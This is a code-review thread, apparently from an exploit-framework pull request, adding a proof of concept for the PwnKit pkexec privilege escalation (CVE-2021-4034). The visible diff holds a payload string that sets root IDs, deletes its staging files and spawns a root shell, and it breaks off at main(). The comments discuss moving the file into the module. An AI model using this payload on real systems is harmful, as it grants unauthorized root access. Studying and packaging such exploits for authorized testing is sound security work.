data/exploits/CVE-2021-4034/cve_2021_4034.c

```diff
@@ -0,0 +1,31 @@
+/*
+ * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu>
+ * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+char *shell = 
+	"#include <stdio.h>\n"
+	"#include <stdlib.h>\n"
+	"#include <unistd.h>\n\n"
+	"void gconv() {}\n"
+	"void gconv_init() {\n"
+	"	setuid(0); setgid(0);\n"
+	"	seteuid(0); setegid(0);\n"
+	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
+	"	exit(0);\n"
+	"}";
+
+int main(int argc, char *argv[]) {
+	FILE *fp;
```

Comment:
Wouldn't it make sense to move the contents of this file into the module itself?

Reply:
Thank you Tim, for reviewing this. Ahem! I tried adding the file content to the module but couldn't make it not sure why maybe, I need time to debug it. So, decided to port in this way.

Reply:
Thanks Jeffrey. So, I couldn't get the code complete working. I took some references from the past modules but was not able to implement the same. Hence, I had this version. If you can point me some other references, I can give a try again.